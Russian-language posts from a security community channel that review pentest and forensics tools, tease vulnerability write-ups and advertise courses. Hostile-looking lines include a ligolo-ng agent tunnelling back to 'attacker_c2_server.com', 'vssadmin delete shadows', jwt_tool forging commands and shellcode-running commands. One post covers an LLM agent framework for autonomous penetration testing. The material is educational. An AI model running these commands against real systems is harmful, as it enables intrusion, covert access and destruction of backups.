Codeby
36.3K subscribers
2.09K photos
98 videos
12 files
7.87K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy

CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
🚨 Российский хакер арестован!

🔗 Российский хакер приговорен к 2 годам лишения свободы за атаки с использованием ботнета TA551, распространявшего программу-вымогатель.

🎇 Министерство юстиции США сообщило*, что гражданин России приговорен к двум годам лишения свободы за управление ботнетом, который использовался для осуществления атак с применением программ-вымогателей против американских компаний.

🪧 40-летний Илья Ангелов из Тольятти (нет, не Италия) также был оштрафован на 100 000 долларов. Ангелов, использовавший в сети псевдонимы «milan» и «okart», предположительно, в период с 2017 по 2021 год был соруководителем российской киберпреступной группы, известной как TA551 (также известной как ATK236, G0127, Gold Cabin, Hive0106, Mario Kart, Monster Libra, Shathak и UNC2420 ).

💵 Главной целью атак была перепродажа доступа другим преступным группам, которые использовали его для вымогательства с помощью программ-вымогателей. В период с августа 2018 года по декабрь 2019 года TA551 предоставила группе BitPaymer, занимавшейся распространением программ-вымогателей, доступ к своему ботнету, что позволило этой группировке атаковать 72 американских корпораций. В результате было выплачено более 14,17 миллионов долларов в виде вымогательских платежей.

✉️ В феврале 2021 года, фишинговые электронные письма, содержащие защищенные паролем архивы, обманом заставляли получателей открывать документы Microsoft Word с поддержкой макросов, что приводило к развертыванию программы для загрузки макросов под названием MOUSEISLAND. Вредоносное ПО служило каналом для вторичной полезной нагрузки, получившей кодовое название PHOTOLOADER, которая, в конечном итоге, установила IcedID. И MOUSEISLAND, и PHOTOLOADER приписываются TA551.

Источник: https://www.justice.gov/usao-edmi/pr/russian-cybercriminal-sentenced-prison-using-botnet-steal-millions-american-businesses

#russia #usa #hacker #ta551

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
15😁11🔥5👍4😍3👀2👌1
☁️ADPulse

Инструмент с открытым исходным кодом, предназначенный для аудита безопасности Active Directory, который подключается к контроллеру домена и выполняет 35 автоматических проверок безопасности. Дает быструю оценку неправильных конфигураций Active Directory, а также ищет уязвимые места в инфраструктуре.


Вместе со сканером безопасности на странице инструмента также представлен скрипт PowerShell с названием test_environment.ps1, с помощью которого можно настроить собственный уязвимый контроллер домена для проведения тестирования.

Как это работает?
1️⃣Подключение — ADPulse связывается с целевым контроллером домена по протоколу LDAPS (порт 636) с автоматическим переключением на LDAP (порт 389). Попытка аутентификации осуществляется с помощью NTLM и протокола SIMPLE bind.
2️⃣Сканирование — каждая из 35 функций проверки запрашивает данные из AD через LDAP и, в случае определенных проверок, выполняет дополнительные операции: легкие сетевые проверки (SMBv1, подписание, нулевые сессии) обнаруженных хостов, обход файловой системы SYSVOL для определения учетных данных GPP и анализ данных DACL для проверок, связанных с ACL.
3️⃣Оценка — результатам присваивается степень критичности и вычитается определенное количество баллов из общей оценки.

Все операции выполняются только с доступом на чтение. ADPulse не изменяет объекты Active Directory, членство в группах, объекты групповой политики или списки управления доступом.

⬇️Установка
# Клонируем репозиторий
git clone https://github.com/yourorg/adpulse.git
cd adpulse

# (Recommended) Создаем виртуальное окружение
python -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows

# Устанавливаем зависимости
pip install -r requirements.txt


Форматы отчетов
➡️Вывод в консоль — вывод в терминале с цветовой кодировкой, позволяющий быстро увидеть критические результаты и ключевые моменты;
➡️JSON — машиночитаемый экспорт для интеграции с системами управления ИБ и событиями безопасности, системами обработки заявок или пользовательскими информационными панелями;
➡️HTML — автономный отчет в темной цветовой гамме со сворачиваемыми разделами, значками уровня критичности, карточками со статистикой, шкалой оценки и списком шаблонов ADCS.

🧿Оценка уровня критичности обнаружений
За каждую обнаруженную мисконфигурацию вычитается определенное количество баллов. Общая оценка начинается со 100 и уменьшается за каждое обнаружение:
📉 80–100 — Низкий — хорошая система безопасности c незначительными проблемами;
📉 60–79 — Средний — существенные недостатки, которые необходимо устранить;
📉 40–59 — Высокий — присутствуют значительные уязвимости;
🖱 0–39 — Критический — серьезные риски, которые требуют немедленного устранения.

Использование
❗️ Для работы с ADPulse требуются действительные учетные данные домена.

1️⃣ Базовое сканирование. Все три формата отчетов по умолчанию создаются в папке Reports/.
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!'


2️⃣ Сканирование с указанием IP DC, генерацией отчета только в формате HTML в директории /tmp/scans.
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!' --dc-ip 10.0.0.1 --report html --output-dir /tmp/scans


#tools #AD #pentesting #infrastructure

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
9🔥6👍4
Один клик — и роутер под контролем атакующего

💀 Открыл письмо, кликнул по ссылке — браузер молча отправил POST-запрос на 192.168.1.1. Без пароля. Без уведомления. Добро пожаловать в CVE-2025-15101.

🔍 Связка CSRF + OS Command Injection в роутерах ASUS (прошивка 3.0.0.6_102 и ниже) даёт атакующему root shell через браузер жертвы. Почему это критично:

• httpd на ASUS работает от root — команды уходят сразу с максимальными привилегиями
• сессия админа в AsusWRT не истекает часами — окно атаки всегда открыто
• нет WAF, CSP, SIEM — атака проходит в тишине

⚠️ Аналогичный паттерн в AsusWRT фиксировали ещё в 2018-м. Номера CVE меняются — архитектура нет.

Полный разбор kill chain, лабораторный стенд и чеклист митигации:

https://codeby.net/threads/cve-2025-15101-csrf-os-command-injection-v-routerakh-asus-polnaya-karta-uyazvimosti-ot-klika-do-root-shell.92554/
👍97🔥4🤯1
🌐 MESH — P2P-сеть для удалённой криминалистика Android в любой точке мира

MESH — это open source-инструмент для удалённой форензики мобильных устройств и сетевого мониторинга через зашифрованную peer-to-peer сеть. Он позволяет анализировать устройства (Android / iOS), даже если к ним нет прямого доступа.


🧠 Идея инструмента
Вместо VPN и централизованных серверов используется overlay mesh-сеть:
▶️устройства выглядят как будто находятся в одной локальной сети
▶️соединение строится напрямую между узлами
▶️нет единой точки отказа

В основе — модифицированный протокол Tailscale с self-hosted control plane и разделением управления и трафика.

🧿Основные возможности
📉 P2P форензика — анализ устройств через прямые соединения без проброса портов
📉 End-to-end шифрование — WireGuard / AmneziaWG с автоматическим управлением ключами
📉 Обход DPI и цензуры — обфускация трафика + fallback на HTTPS-реле
📉 CGNAT bypass — устройства получают виртуальные адреса и работают как в одной сети
📉 Интеграция с инструментами — MVT, AndroidQF, ADB, libimobiledevice
📉 Kill-switch — изоляция устройства во время анализа
🖱 Ephemeral-сети* — быстрое создание и уничтожение forensic-сессий

*Ephemeral-сети — это временные сети, которые создаются под конкретную задачу


☁️ Как работает MESH

MESH создаёт распределённую сеть из трёх компонентов:

⏺️ Control plane — координация узлов и обмен ключами
⏺️ Analyst node — машина исследователя
⏺️ Endpoint — целевое устройство (Android/iOS)

При этом:
➡️ трафик идёт напрямую между узлами
➡️ control plane не участвует в передаче данных
➡️ при блокировке UDP используется HTTPS relay

Это позволяет:
➡️ обходить NAT
➡️ скрывать активность от DPI
➡️ работать в цензурированных средах

🧾 Базовый сценарий использования

1️⃣ Клонирование репозитория
git clone https://github.com/BARGHEST-ngo/MESH.git
cd mesh/control-plane


2️⃣ Запуск control plane
docker-compose up -d


3️⃣ Доступ к веб-интерфейсу
https://localhost:3000/login

4️⃣ Создание API-ключа
docker exec headscale headscale apikeys create --expiration 90d

После этого можно подключать устройства и начинать форензику.

#mesh #p2p #forensics #mobile #privacy #security #blueteam #dfir #threatintel

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍8🔥8🤔2🌚1
🔁 ligolo-ng

Простой, легкий и быстрый инструмент, который позволяет пентестерам создавать туннели на основе обратного TCP/TLS-соединения с использованием интерфейса tun (без необходимости в SOCKS). Поддерживаются протоколы TCP, UDP, ICMP.


👉 Принцип работы
Пакеты, отправляемые в TUN-интерфейс при запуске прокси-сервера, транслируются и затем передаются в удалённую сеть агента.

Например, для TCP-соединения процесс работает следующим образом:
⏺️SYN-пакеты преобразуются в системный вызов connect() на удалённой стороне.
⏺️Если connect() выполняется успешно, обратно отправляется SYN-ACK.
⏺️Если после вызова connect() возвращаются ошибки ECONNRESET, ECONNABORTED или ECONNREFUSED, отправляется RST-пакет.
⏺️Если соединение завершается тайм-аутом, никакого ответа не отправляется.

Такой механизм позволяет использовать инструменты, например Nmap, без необходимости использования proxychains.

📐Характеристики
📉Удобный пользовательский интерфейс с возможностью выбора агента и отображением информации о сетевых соединениях;
📉Автоматическая настройка сертификата с использованием Let's Encrypt;
📉Агент не требует повышенных привилегий на целевой системе;
📉Поддержка одновременной работы с несколькими туннелями;
📉Поддержка WebSocket-соединений;
📉Поддержка режимов reverse-подключения и bind-подключения.

🔎 Установка
Можно произвести установку из репозитория Kali Linux : apt install ligolo-ng.
Или собрать через go:
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go


➡️Использование
При использовании в Linux необходимо создать интерфейс tun на прокси-сервере:
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up


Далее необходимо запустить прокси-сервер на своем сервере (порт по умолчанию 11601):
./proxy -autocert 
./proxy -selfcert


После этого запускается агент на целевой системе:
./agent -connect attacker_c2_server.com:11601


После подключения агента на прокси-сервере появится новая сессия:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000


Через команду session необходимо выбрать нужного агента и далее запустить туннелирование на прокси-сервере, используя имя интерфейса.

❗️С версии 0.8 в инструменте поддерживается управление через веб-интерфейс.

#tools #tun #pentest #network

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
12👍8🔥6
Друзья, напоминаем, на каких курсах начинается обучение в апреле! 🚗

Старт 6 апреля:
🙂🙃😄🥲🙂☺️😀 ⤵️
Курс «Профессия аналитик центра мониторинга безопасности (SOC)»запускаем новый курс. Это возможность войти в профессию с нуля: на курсе освоите работу с инцидентами ИБ, научитесь выявлять атаки и анализировать события.

Старт 16 апреля:
Курс «Тестирование Веб-приложений на проникновение (WAPT)»отработаем полный цикл тестирования: от разведки до пост-эксплуатации.

Старт 20 апреля:

Курс «OSINT: технология боевой разведки» освоим профессиональный поиск информации и анализ данных из открытых источников.

Старт 27 апреля:
Курс «Профессия DevSecOps - инженер: безопасная разработка»освоим DevSecOps-инженерию: от автоматизации безопасности до работы с Kubernetes и Terraform.
Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)» ищем и анализируем следы кибервзломов (анализ артефактов, работа с opensource инструментами).

🪧Запишитесь у нашего менеджера @CodebyAcademyBot

Или узнайте подробности и программы курсов — на нашем
➡️ сайте
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍63🔥2
Codeby pinned a photo
Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!

👩‍💻 Категория Pentest MachinesГрузоперевозки

Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍5🔥3
Forwarded from Hacker Lab
❗️ Сертификаты в HackerLab

В HackerLab запускается сертификация. На текущий момент сертификат доступен участникам, успешно завершившим курс SQL Injection Master и сдавшим итоговый экзамен.

Экзамен представляет собой практическую эксплуатацию уязвимостей в изолированной инфраструктуре. Вы не отвечаете на вопросы - вы атакуете систему, находите уязвимости и шаг за шагом развиваете атаку.

Это не просто «галочка», а результат, подтверждённый практикой.

🎁 В честь запуска сертификации дарим промокод на скидку 20% для подписки PRO. Действует до 30 апреля:
PRO20


➡️ Подробности и программа курса
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥94👎2🎉2😎1
Zero-click через стикер: 9.8 и молчание Telegram

Получил стикер — устройство скомпрометировано. Без клика, без уведомления. Именно это описывает ZDI-CAN-30207 — и именно это Telegram отрицает.

🔍 Оценка CVSS 9.8 — не маркетинг. Математика за ней конкретна: метрика UI:N (zero-click) даёт коэффициент 0.85 вместо 0.62 при клике. Разница — 9.8 против 8.1. Оба сценария критичны, но zero-click означает массовую эксплуатацию без единого действия жертвы.

⚙️ Аналог по вектору — CVE-2019-3568, buffer overflow в WhatsApp VoIP: идентичный CVSS, идентичная схема. Статус ZDI-CAN-30207 сейчас — disputed: ZDI верифицировал, вендор отрицает. Разбираем CVSS-математику, хронологию disclosure и методы инструментирования клиента для мониторинга.

Полный разбор:
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/
6❤‍🔥1
Бэкап — цель номер один 🎯

Шифровальщик отработал за 47 минут. Когда команда полезла восстанавливаться — репозиторий Veeam зашифрован, каталог tape-библиотеки удалён, VSS-снимки стёрты за двое суток до запуска payload.

Это не баг шифровальщика — это Recovery Denial: атакующие методично уничтожают бэкапы до старта шифрования. По данным Mandiant M-Trends 2025, уничтожение возможностей восстановления — одна из самых частых тактик ransomware-группировок. Бэкап — не страховка, а первая мишень. 🔥

Что делают атакующие в первую очередь:
vssadmin delete shadows — VSS за дни до шифрования
• Останавливают службы Veeam и удаляют SQL-каталог
• Ищут Veeam-серверы через AD и ломятся по доменным учёткам.

Подробный разбор:
https://codeby.net/threads/recovery-denial-zashchita-rezervnykh-kopii-ot-ransomware-taktiki-atakuyushchikh-i-metody-protivodeistviya.92571/
5👎1🔥1😁1👀1
PacketSender: Утилита для отправки и приема сетевых пакетов

PacketSender — это кроссплатформенное приложение с открытым исходным кодом, предназначенное для отправки и приема TCP, UDP, SSL-пакетов, а также HTTP/HTTPS-запросов. Инструмент предоставляет графический интерфейс и возможности командной строки, позволяя тестировать сетевое взаимодействие, отлаживать серверные приложения и выполнять диагностику сетевых протоколов.


🎇Основные функции
- Поддержка протоколов (TCP, UDP, SSL (TLS), HTTP/HTTPS)
- Режимы работы - клиент (отправка) и сервер (прослушивание)
- Генератор интенсивного трафика (нагрузочное тестирование с настраиваемой скоростью)
- Поддержка макросов (подстановка даты, времени, счетчика и случайных значений)
- Панели управления - создание кнопочных панелей для быстрого выполнения команд

⬇️Установка
sudo apt install packetsender

Проверка
packetsender —h


1️⃣Примеры использования CLI
⏺️Отправка UDP
packetsender -u 192.168.1.100 8080 "Hello UDP"



⏺️Режим сервера (прослушивание TCP)
packetsender -l -t -b 8080


⏺️Генератор интенсивного трафика (20 Гц)
packetsender --rate 20 --name "Test Packet"


⏺️Отладка сетевого сервера
#режим сервера для приема данных
packetsender -l -t -b 9999

#отправка тестовых данных из другого окна
packetsender -t localhost 9999 "TEST"


⏺️Проверка SSL/TLS соединения
packetsender -s expired.packetsender.com 443 "GET / HTTP/1.0\r\n\r\n"


⏺️Нагрузочное тестирование
packetsender --bps 1000000 --num 10000 --name "Status Check"


2️⃣Использование графического интерфейса (GUI). Основные элементы:
▶️Поля ввода (имя пакета, данные (ASCII/HEX), адрес, порт)
▶️Выбор протокола (TCP, UDP, SSL, HTTP GET, HTTP POST)
▶️Таблица сохраненных пакетов - двойной клик для редактирования
▶️Кнопка отправки - выполнение выбранного пакета
▶️Лог трафика (отображение отправленных и полученных данных)
▶️Индикаторы серверов (UDP, TCP, SSL серверы с отображением портов)

#PacketSender #NetworkTesting #TCP #UDP #pentest #tool

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍6🔥4😁1
PentestAgent

⏺️ PentestAgent — это передовой фреймворк для автоматизированного пентеста, который использует большие языковые модели (LLM) и мультиагентную архитектуру для выполнения задач по тестированию на проникновение с минимальным участием человека. Существует две основные версии продукта: академическая (исследовательский проект) и практическая (инструмент для реального использования).

🧠 Академическая версия:

Это оригинальный проект, представленный на конференции ACM AsiaCCS группой исследователей из Северо-Западного университета, Чжэцзянского университета и Ant Group. Фреймворк построен на мультиагентной коллаборации, где каждый агент отвечает за свой этап пентеста в соответствии со стандартом PTES (Penetration Testing Execution Standard): Reconnaissance Agent, Search Agent, Planning Agent и Execution Agent

Исследователи создали бенчмарк на основе 67 целей из VulHub и HackTheBox (различные CWE и уровни сложности). Результаты при использовании GPT-4 :
➡️ Общая успешность: 74.2% (у GPT-3.5 — 60.6%)
➡️ Простые задачи: 100% завершения на этапах разведки и анализа
➡️ Сложные задачи: успешность снижается до 50% на этапе разведки

Сравнение с PentestGPT показало значительное преимущество в скорости: этап разведки занял 220 секунд против 1199 секунд.

🔑 Практическая версия:

Параллельно с академическим проектом существует активно развивающийся open-source инструмент от сообщества GH05TCREW на GitHub.

❗️ Требования: Python 3.10+, API ключ OpenAI, Anthropic или другого провайдера (поддерживается LiteLLM)
git clone https://github.com/GH05TCREW/pentestagent.git
cd pentestagent
./scripts/setup.sh


⛓️‍💥 Запуск:
pentestagent -t 192.168.1.1 

Режим работы:
⏺️ /assist - Единичный запрос с выполнением инструментов
⏺️ /agent - Автономное выполнение одной задачи
⏺️ /crew - Мультиагентный режим
⏺️ /interact - Интерактивный режим с подсказками

Как считаете, способен данный продукт полностью автоматизировать пентест?

#pentestagemt #ai #pentest #python #openai

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
7🔥4👍3😁2
JWT_TOOL

jwt_tool - это набор инструментов для проверки, подделки, сканирования и изменения JWT (JSON Web Tokens).


📐Функциональность:
📉Проверка действительности токена
📉Проверка на наличие уязвимостей - (CVE-2015-2951, CVE-2016-10555, CVE-2018-0114 и т.д)
📉Проверка на наличие некорректных настроек или известных уязвимостей.
📉Выявление слабых ключей с помощью высокоскоростной словарной атаки
🖱Генерация и восстановление ключей RSA и ECDSA (из файлов JWKS)

⬇️Установка:
0️⃣Клонирование репозитория:
git clone https://github.com/ticarpi/jwt_tool.git

1️⃣Переход в рабочую директорию:
cd jwt_tool/


⛓️‍💥Запуск:
➡️Разведка:
python3 jwt_tool.py <JWT_TOKEN>

➡️Сканирование:
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -M pb

➡️Эксплуатация:
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -X i -I -pc name -pv admin

➡️Фаззинг (более глубокий анализ):
python3 jwt_tool.py -t <URL> -rc "jwt=<JWT_TOKEN>;anothercookie=hack" -I -hc kid -hv custom_sqli_vectors.txt


#web #jwt

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍5🔥4
🌐STEWS — инструмент для тестирования и перечисления WebSockets.

🎯Возможности
⏺️Нахождение конечных точек WebSockets, путем тестирования перечня доменов. Использует модифицированную версию ZGrab2 для проверки URL-адресов на поддержку WebSocket путем отправки первой части процедуры установления соединения WebSocket.

⏺️Определение, какой сервер WebSockets работает на конечной точке:
использует различия на уровне реализации в популярных реализациях WebSocket, чтобы попытаться идентифицировать запущенные серверы WebSocket. STEWS использует функции сервера как в процессе установления соединения WebSocket (с использованием протокола HTTP), так и в рамках протокола WebSocket (с использованием протокола WebSocket).

⏺️Проверка, не подвержен ли сервер WebSockets известным уязвимостям CVE или другим уязвимостям WebSockets: CSWSH (перехват межсайтовых веб-сокетов), CVE-2020-27813,CVE-2020-7662 и CVE-2020-7663, CVE-2021-32640.

Что такое WebSockets
WebSocket обеспечивает постоянное соединение между клиентом и сервером. Данные передаются в обе стороны без задержек - сообщения в чате приходят сразу, а игровые действия синхронизируются в реальном времени. Появление WebSocket стало прорывом для сервисов, где важна мгновенная реакция.

➡️Установление соединения. Соединение WebSocket начинается с обычного HTTP-запроса, в который включается заголовок Upgrade,сообщающий о желании перейти на протокол Websocket. Этот процесс называется Websocket-handshake

➡️Обмен данными. После успешного “рукопожатия” устанавливается постоянное соединение и данные могут передаваться в реальном времени в обе стороны без необходимости отправлять новый запрос.

Использование
1️⃣Поиск уязвимостей представляет собой выбор из четырех возможных тестов. Ниже представлен выбор четвертого теста для проверки CVE-2020-27813.
python3 STEWS-vuln-detect.py -4 -n -u 127.0.0.1:8084


2️⃣Запуск всех тестовых сценариев с флагом -a обеспечивает наиболее точное сопоставление отпечатков, что может занять много времени и потребовать отправки большого объема данных на конечную точку, для которой выполняется снятие отпечатка.
python3 STEWS-fingerprint.py -1 -k -u streamer.finance.yahoo.com


3️⃣Для нахождения конечных точек WebSockets в файле known-endpoints.txt необходимо указать целевые домены и запустить следующий сценарий.
STEWS-discovery.sh


#tools #websockets #network

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
7🔥7👍5
Qu1cksc0pe: Многофункциональный инструмент для статического и динамического анализа вредоносного ПО

Qu1cksc0pe — это универсальная платформа с открытым исходным кодом для статического и динамического анализа вредоносного программного обеспечения. Инструмент предназначен для исследования широкого спектра файлов: от исполняемых binaries Windows, Linux и macOS до документов, APK-файлов, архивов и сценариев PowerShell. Основная цель — предоставить исследователям безопасности максимальный объем информации о подозрительных файлах, помогая понять их функциональность и потенциальные угрозы.


🧿Поддерживаемые форматы файлов
- Windows (.exe, .dll, .msi, .bin)
- Linux (.elf, .bin)
- macOS (mach-o)
- Android (.apk, .jar, .dex)
- Документы (.doc, .docm, .docx, .xls, .xlsx, .pdf, .rtf, .one)
- Скрипты (VBScript/VBA (.vbs, .vbe, .vba), PowerShell)
- Архивы (.zip, .rar)

⬇️Установка
pipх install quickscope

Проверка
quickscope -h


⏺️Базовый анализ
python quickscope --file suspicious_file.exe --analyze


⏺️Быстрый анализ подозрительного EXE-файла
python quickscope --file unknown_sample.exe --analyze --vtFile


⏺️Глубокий анализ документа с извлечением макросов
python quickscope --file invoice.doc --docs


⏺️Проверка APK на наличие вредоносного поведения
#cтатический анализ
python quickscope --file malicious.apk --analyze

#динамический анализ (с подключенным устройством)
python quickscope --file malicious.apk --watch


⏺️Пакетное сканирование коллекции образцов
python quickscope --folder ./malware_collection --hashscan


⏺️Извлечение индикаторов компрометации
python quickscope --file suspicious_sample.exe --analyze --report | jq '.iocs'


#Qu1cksc0pe #StaticAnalysis #DynamicAnalysis #tool #pentest #MITRE

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍75
От доменного пользователя до Domain Admin за 15 минут

🔍 Не хвастовство — воспроизводимая цепочка. Типовые мисконфиги до сих пор живут в продакшене, и путь наверх часто короче, чем кажется.

⚔️ Полный цикл AD exploitation — от nmap-скана до DCSync — с командами и разбором флагов:

BloodHound строит граф атаки: три-четыре промежуточных объекта до Domain Admin, которые руками не найти
Kerberoasting и AS-REP Roasting — с настройкой уязвимой лабы на PowerShell
• В SYSVOL до сих пор лежат GPP-пароли: ключ шифрования Microsoft сама опубликовала

📖 Команды, флаги, разбор ошибок — полный гайд:

https://codeby.net/threads/pentest-active-directory-polnyi-gaid-ot-razvedki-do-domain-admin-v-2026.92603/
👍94🔥3🗿2
🧠sickle-pdk

Набор инструментов для создания полезной нагрузки. В инструменте реализован модульный подход, позволяющий добавлять новые функции с минимальными затратами времени на изучение структуры инструмента.


Возможности
1️⃣Генерация шелл-кода - поддерживает генерацию шелл-кода с помощью Keystone Engine.

2️⃣Sickle включает модуль diffing, изначально разработанный для анализа заглушек шелл-кода. Оригинальный режим asm выполняет линейное сравнение различий дизассемблированного кода как на уровне ассемблера, так и отдельно на уровне опкодов. Кроме того, Sickle предлагает различные режимы сравнения, что делает его полезным не только при разработке шелл-кода

3️⃣Выполнение шелл-кода. Одна из распространенных задач, которую часто приходится выполнять, — это тестирование шелл-кода. Этот процесс обычно состоит из следующих этапов:
▶️Компиляция кода на языке ассемблера.
▶️Извлечение шелл-кода и форматирование его в соответствии с выбранной оболочкой.
▶️Компиляция и запуск оболочки.

Sickle упрощает процесс, автоматически оборачивая шелл-код для быстрого тестирования, а модуль run в настоящее время поддерживает как Windows, так и Unix

4️⃣Дизасемблирование - Sickle также может преобразовывать двоичный файл в извлеченные опкоды, а затем преобразовывать их в машинные инструкции (ассемблер).

5️⃣Извлечение шелл-кода - основная функция Sickle, поскольку опкоды интерпретируются по-разному в зависимости от используемой оболочки. Например, JavaScript не хранит и не интерпретирует шелл-код так же, как программы на языке C.

6️⃣Выявление недопустимых символов. Хотя в 64-битных эксплойтах это встречается реже, могут быть случаи, когда эксплойт ограничивает использование определённых символов. Именно здесь модуль pinpoint особенно полезен, так как он напрямую определяет и выделяет инструкции ассемблера, ответственные за обнаруженные недопустимые символы.

⛓️‍💥Использование
➡️Сравнение
sickle-pdk -m diff -r calc.exe BINFILE=calc2.exe MODE=htxdump


➡️Выполнение шелл-кода
sickle-pdk -m run -r shellcode.bin


➡️Дизасемблирование
sickle-pdk -r generic_sc -m disassemble


➡️Извлечение шелл-кода
sickle-pdk -r generic_sc -f rust 


#tools #payload #assemler

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍5🔥5
Один граф — и весь домен как на ладони

🔍 Получил учётку рядового пользователя в домене? У тебя есть минуты, чтобы найти путь до Domain Admin — пока SOC не среагировал.

BloodHound превращает тысячи объектов Active Directory в читаемый граф атак. Никакой магии — только математика на графах.

Что внутри:
1. SharpHound.exe -c DCOnly — минимум шума, максимум данных с контроллера
2. bloodhound-python — сбор с Linux без файлов на цели
3. Cypher-запросы под нестандартные сценарии — когда стандартных путей нет

🎯 ACL-права типа GenericAll или WriteDACL на нужном объекте — это уже готовый вектор атаки, который большинство команд защиты не видит в упор.

Полный разбор от запуска коллектора до эксплуатации ACL:

https://codeby.net/threads/bloodhound-active-directory-razvedka-domena-postroyeniye-grafa-atak-i-ekspluatatsiya-acl.92606/
7👍3🔥3
💻 Living Off The Land Active Directory

Exploiting Native AD Techniques for Security


😉 LOLAD

Проект
предоставляет обширную коллекцию методов, команд и функций 💻 Active Directory, которые можно использовать для операций по обеспечению безопасности и тренировки Redteam

Некоторые примеры:

# Collect Domain SID
Get-ADDomain | Select-Object SID

# Users with Delegation Privileges
Get-ADUser -Filter {TrustedForDelegation -eq $true}

# Get Domain Users Last Logon Time
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate

# List Users in Specific Group
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName

# List Service Principal Names (SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName

# Check for Kerberos Pre-Authentication Disabled Accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName


💻 Repo

#lolad #redteam #ad #windows

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥85👍3🙊1
Какой сертификат пентестера реально стоит денег?

CEH стоит в вакансиях рядом с OSCP — но это как сравнивать вождение в симуляторе с реальной трассой. Один экзамен проверяет умение ткнуть в правильный вариант из четырёх, другой — взломать машину и написать отчёт за 48 часов.

🔐 Автор лично сдал OSCP и eJPT, готовился к PNPT и видел CEH у коллег. Вот его вывод:

OSCP — минимальный порог для консалтинга и red team. Без него резюме часто не открывают.
CEH — нужен для госсектора и compliance, а не для реального взлома.
eJPT/PNPT — старт для тех, кто ещё не готов к OSCP, но хочет практики.

В OSCP+ 2025 убрали бонусные баллы за курс — теперь всё решает только экзамен. Жёстче, но честнее.

Полный разбор форматов, цен и рекомендаций:

https://codeby.net/threads/sertifikatsiya-po-pentestu-oscp-vs-ceh-vs-ejpt-vs-pnpt-chestnoye-sravneniye-ot-praktika.92610/
🔥18👍73